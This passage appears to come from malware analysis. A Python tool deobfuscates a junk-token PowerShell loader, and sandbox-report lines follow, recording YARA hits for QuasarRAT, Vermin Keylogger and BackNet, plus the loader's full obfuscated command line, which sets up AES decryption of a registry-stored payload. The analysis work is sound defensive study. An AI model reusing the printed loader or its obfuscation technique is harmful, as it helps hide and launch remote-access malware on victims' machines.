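    r"$H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); "
    r"$qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); "
    r"$ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); "
    r"$hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); "
    r"$iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); "
    r"$QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); "
    r"function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); "
    r"Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); "
    r"Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); "
    r"Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); }"
)

# 'junk-laden text'.Replace('junk', '') : capture the text and the token.
JUNK_STMT = re.compile(r"'([^']*)'\.Replace\('([^']+)',\s*''\)")
# function NAME([byte[]]$arg) {Invoke-Expression ... 'junk'.Replace('junk', '')
HELPER_DEF = re.compile(
    r"function\s+(\w+)\s*\(\[byte\[\]\]\$\w+\)\s*\{Invoke-Expression[^']*"
    r"'([^']*)'\.Replace\('([^']+)',\s*''\)"
)
PS_COMMENT = re.compile(r"<#.*?#>")
NUMBER = re.compile(r"0[xX][0-9a-fA-F]+|\d+")


def unjunk_statements(script):
    """Every Invoke-Expression'd statement with its junk token removed, in order of appearance."""
    return [body.replace(token, "") for body, token in JUNK_STMT.findall(script)]


def find_helpers(script):
    """Map byte[]-taking helper name -> the cleaned statement it runs (UTF8.GetString, ToInt32)."""
    return {name: body.replace(token, "") for name, body, token in HELPER_DEF.findall(script)}


def parse_bytes(arglist):
    """'0x74<#AgF8G#>,0x52<#sotVh#>, 106, 53' -> bytes; comments dropped, hex or decimal accepted."""
    cleaned = PS_COMMENT.sub("", arglist)
    return bytes(int(t, 16) if t.lower().startswith("0x") else int(t) for t in NUMBER.findall(cleaned))


def recover(script):
    """Map variable name -> decoded value for every '$var = helper(byte, byte, ...)' assignment."""
    helpers = find_helpers(script)
    if not helpers:
        return {}
    assign = re.compile(r"\$(\w+)\s*=\s*(" + "|".join(map(re.escape, helpers)) + r")\(([^)]*)\)")
    out = {}
    for var, helper, arglist in assign.findall(script):
        data, stmt = parse_bytes(arglist), helpers[helper]
        if "UTF8.GetString" in stmt:
            out[var] = data.decode("utf-8")
        elif "ToInt32" in stmt:
            out[var] = int.from_bytes(data[:4], "little", signed=True)
        else:
            out[var] = data.hex()  # unknown helper: hand the raw bytes to the analyst
    return out


def describe(value):
    """Size-based triage label (heuristic): 32 base64-decoded bytes fit an AES-256 key, 16 an IV."""
    if isinstance(value, int):
        return f"int32 {value}"
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        raw = None
    if raw is not None and len(raw) == 32:
        return "base64, 32 bytes (AES-256 key size)"
    if raw is not None and len(raw) == 16:
        return "base64, 16 bytes (AES block size, IV candidate)"
    return "path" if "\\" in value else "string"


if __name__ == "__main__":
    for var, value in recover(SAMPLE).items():
        print(f"${var:<6} = {value!r:<50} {describe(value)}")
    print("--- cleaned statements ---")
    for stmt in unjunk_statements(SAMPLE):
        print(stmt)
```

Feed the full command line from the report to recover() and unjunk_statements() instead of SAMPLE; the same regexes cover all three variants, since only the junk tokens and helper names differ between them. Nothing is executed, so this is safe on a triage box. The cleaned statements show an [System.Security.Cryptography.Aes] object configured with CipherMode CBC, PaddingMode PKCS7 and the recovered base64 key and IV, which is what an analyst would use to decrypt the blob the loader reads from the registry.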
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C023A546
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C023B6F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0231E06
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0232BB2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C02F401D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0233A10
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0250160
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C025A298
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0254BEC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0312C40
                      Source: test.vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5035
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5003
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4833
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4325
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: Process Memory Space: powershell.exe PID: 7252, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 6104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@21/14@3/4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\615456d8-1d6d-425c-ab75-75d0b24fbc45
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwtxwxrf.ode.ps1
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = 
iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = 